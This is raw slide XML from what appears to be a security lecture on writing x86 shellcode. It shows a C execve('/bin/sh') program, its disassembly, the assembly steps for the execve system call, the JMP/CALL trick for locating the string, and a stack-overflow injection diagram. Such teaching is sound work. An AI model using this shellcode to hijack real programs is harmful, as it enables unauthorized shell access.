                <a:latin typeface="Courier New" pitchFamily="49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void main()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   char *name[2];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   name[0] = "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";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   name[1] = NULL;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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(name[0], name, NULL);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err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gcc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mr-IN" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>m32 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -g -static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellcode.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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400" dirty="0">
              <a:latin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27060" y="5988423"/>
            <a:ext cx="2935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 didn’t I include all the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compiler options used before?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96872" y="2519082"/>
            <a:ext cx="3215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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> looks here for executable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0800000" flipV="1">
            <a:off x="3048004" y="4231341"/>
            <a:ext cx="1317808" cy="519952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93978" y="3272108"/>
            <a:ext cx="32921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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is derived from length of this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>array; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IS this array (but it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>must be copied… why?).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NULL would work here just fine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3863790" y="3406586"/>
            <a:ext cx="1317811" cy="331696"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="00206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 flipV="1">
            <a:off x="3801040" y="4007223"/>
            <a:ext cx="1757078" cy="690281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82237" y="5047120"/>
            <a:ext cx="281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leave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> NULL for now</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4580965" y="4993342"/>
            <a:ext cx="1201272" cy="238445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99DDC-EEC3-7B44-89F2-2D1C24E7A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97DFD-D790-AF44-A41F-73C2AEF5E36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come the spawned shell prints just a simple prompt?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$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01391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Disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> binary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1943"/>
            <a:ext cx="6889313" cy="32874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00262" y="1639250"/>
            <a:ext cx="1463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Preamble; no locals needed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rot="10800000" flipV="1">
            <a:off x="4889612" y="1920795"/>
            <a:ext cx="1757078" cy="690281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35375" y="3279368"/>
            <a:ext cx="2091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 parameters into registers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78920" y="4846911"/>
            <a:ext cx="2091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matters on failure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721428" y="4336143"/>
            <a:ext cx="3755571" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/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721428" y="2939143"/>
            <a:ext cx="3737429" cy="1396999"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="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9853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220" y="1890488"/>
            <a:ext cx="1183495" cy="230051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eax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ebx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ecx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edx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83907" y="3040754"/>
            <a:ext cx="2083381" cy="55154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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sh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35286" y="4082155"/>
            <a:ext cx="1469572" cy="90714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807277" y="4542983"/>
            <a:ext cx="1288723" cy="341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>
            <a:normAutofit fontScale="62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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>00000000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814533" y="4151097"/>
            <a:ext cx="1288723" cy="341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>
            <a:normAutofit fontScale="62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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier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832677" y="5584383"/>
            <a:ext cx="1288723" cy="341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>
            <a:normAutofit fontScale="62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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>00000000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748392" y="2028373"/>
            <a:ext cx="1288723" cy="341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>
            <a:normAutofit fontScale="62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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0000000b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796143" y="2703288"/>
            <a:ext cx="2703286" cy="526143"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2857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803399" y="3291116"/>
            <a:ext cx="2623459" cy="863601"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2857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767114" y="4107545"/>
            <a:ext cx="2750458" cy="1589314"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2857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/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6686879" y="4009581"/>
            <a:ext cx="2083381" cy="55154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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5330370" y="4285353"/>
            <a:ext cx="1356509" cy="10877"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2857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17714" y="6259286"/>
            <a:ext cx="5025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(How might we save some memory?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175620212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save memory, just do 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75508" y="2452921"/>
            <a:ext cx="1183495" cy="230051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eax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ebx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ecx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edx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74195" y="3004468"/>
            <a:ext cx="2083381" cy="55154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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sh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98146" y="4354300"/>
            <a:ext cx="1469572" cy="90714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170137" y="4815128"/>
            <a:ext cx="1288723" cy="341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>
            <a:normAutofit fontScale="62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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>00000000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177393" y="4423242"/>
            <a:ext cx="1288723" cy="341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>
            <a:normAutofit fontScale="62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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier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038680" y="2590806"/>
            <a:ext cx="1288723" cy="341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>
            <a:normAutofit fontScale="62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dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0000000b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086431" y="3265721"/>
            <a:ext cx="2630715" cy="18143"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2857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093687" y="3853549"/>
            <a:ext cx="2605316" cy="482601"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2857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039259" y="4361550"/>
            <a:ext cx="2750458" cy="555172"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2857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5043717" y="3537864"/>
            <a:ext cx="653143" cy="1052286"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2857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02277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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Synopsis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922940"/>
            <a:ext cx="81534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Have the null terminated string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> somewhere in memory.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Have the address of the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> somewhere in memory followed by a NULL long word.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Copy 0xb into the EAX register.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Copy the address of the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> into the EBX register.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Copy the address of the address of the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> into the ECX register.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Copy the address of the null long word into the EDX register.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Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin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</a:rPr>
              <a:t> $0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> instruction.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string_addr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</a:rPr>
              <a:t>string_addr_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   $0x0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null_byte_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   $0x0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null_string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   $0xb,%eax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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>leal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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        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   $0x80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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   $0x1, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   $0x0, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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        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   $0x80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        /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> string goes here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75115" y="86303"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="ctr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One Problem: Where is the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itchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>/bin/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itchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>sh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string in memory?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don’t know the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="29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address</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2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buffer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 we don’t know the address of the string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“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2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sh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”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="2" indent="-274320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/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2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In x86_64 there is a mov IP,XX instruction, but not in x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="640080" lvl="1" indent="-274320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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" noProof="0" dirty="0"/>
              <a:t>We want our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" noProof="0" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" noProof="0" dirty="0"/>
              <a:t> to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" noProof="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>relocatable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trick to find it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="9144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JMP to the end of the code and CALL back to the start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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These can use relative addressing modes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="9144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CALL will put the return address on the stack and this will be the absolute address of the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="9144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will pop this string into a register!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>To illustrate, assume our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> is injected on the stack</a:t>
            </a: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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the stack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95600" y="2667000"/>
            <a:ext cx="2743200" cy="914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95600" y="3581400"/>
            <a:ext cx="2743200" cy="457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95600" y="4038600"/>
            <a:ext cx="2743200" cy="457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95600" y="4495800"/>
            <a:ext cx="2743200" cy="457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895600" y="4953000"/>
            <a:ext cx="2743200" cy="457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95600" y="5410200"/>
            <a:ext cx="2743200" cy="457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346325" y="5524500"/>
            <a:ext cx="2857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c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362200" y="5029200"/>
            <a:ext cx="2984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b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2362200" y="4572000"/>
            <a:ext cx="2984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a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2209800" y="4059238"/>
            <a:ext cx="550863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</a:rPr>
              <a:t>ret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981200" y="2667000"/>
            <a:ext cx="91757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</a:rPr>
              <a:t>buffer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4197350" y="5448300"/>
            <a:ext cx="2984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3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4197350" y="5029200"/>
            <a:ext cx="2984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2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4197350" y="4572000"/>
            <a:ext cx="2984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5775325" y="5448300"/>
            <a:ext cx="8255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4 bytes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5791200" y="5029200"/>
            <a:ext cx="8255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4 bytes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5803900" y="4510088"/>
            <a:ext cx="8255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4 bytes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3124200" y="2819400"/>
            <a:ext cx="2362200" cy="1314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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JJSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSCCsssssssssssssssssssss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3124200" y="4135438"/>
            <a:ext cx="23844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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Jump to Shell Code</a:t>
            </a:r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3352800" y="2362200"/>
            <a:ext cx="3048000" cy="1905000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2209800 w 1920"/>
              <a:gd name="T1" fmla="*/ 1905000 h 1200"/>
              <a:gd name="T2" fmla="*/ 3048000 w 1920"/>
              <a:gd name="T3" fmla="*/ 1905000 h 1200"/>
              <a:gd name="T4" fmla="*/ 3048000 w 1920"/>
              <a:gd name="T5" fmla="*/ 0 h 1200"/>
              <a:gd name="T6" fmla="*/ 0 w 1920"/>
              <a:gd name="T7" fmla="*/ 0 h 1200"/>
              <a:gd name="T8" fmla="*/ 0 w 1920"/>
              <a:gd name="T9" fmla="*/ 457200 h 1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20"/>
              <a:gd name="T16" fmla="*/ 0 h 1200"/>
              <a:gd name="T17" fmla="*/ 1920 w 1920"/>
              <a:gd name="T18" fmla="*/ 1200 h 1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20" h="1200">
                <a:moveTo>
                  <a:pt x="1392" y="1200"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1920" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="288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2743200" y="3048000"/>
            <a:ext cx="457200" cy="762000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 381000 w 288"/>
              <a:gd name="T1" fmla="*/ 0 h 480"/>
              <a:gd name="T2" fmla="*/ 0 w 288"/>
              <a:gd name="T3" fmla="*/ 0 h 480"/>
              <a:gd name="T4" fmla="*/ 0 w 288"/>
              <a:gd name="T5" fmla="*/ 762000 h 480"/>
              <a:gd name="T6" fmla="*/ 457200 w 288"/>
              <a:gd name="T7" fmla="*/ 762000 h 480"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 288"/>
              <a:gd name="T13" fmla="*/ 0 h 480"/>
              <a:gd name="T14" fmla="*/ 288 w 288"/>
              <a:gd name="T15" fmla="*/ 480 h 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8" h="480">
                <a:moveTo>
                  <a:pt x="240" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288" y="480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1447800" y="2057400"/>
            <a:ext cx="2133600" cy="1828800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2133600 w 1056"/>
              <a:gd name="T1" fmla="*/ 1828800 h 1200"/>
              <a:gd name="T2" fmla="*/ 0 w 1056"/>
              <a:gd name="T3" fmla="*/ 1828800 h 1200"/>
              <a:gd name="T4" fmla="*/ 0 w 1056"/>
              <a:gd name="T5" fmla="*/ 0 h 1200"/>
              <a:gd name="T6" fmla="*/ 2133600 w 1056"/>
